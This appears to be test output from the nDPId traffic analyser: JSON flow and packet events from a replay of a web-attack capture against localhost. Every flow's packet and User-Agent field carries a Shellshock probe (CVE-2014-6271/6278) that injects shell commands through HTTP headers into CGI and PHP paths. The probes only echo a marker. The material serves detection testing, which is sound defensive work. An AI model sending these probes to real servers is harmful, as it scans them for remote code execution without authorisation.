+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} 
+01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} 
+01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
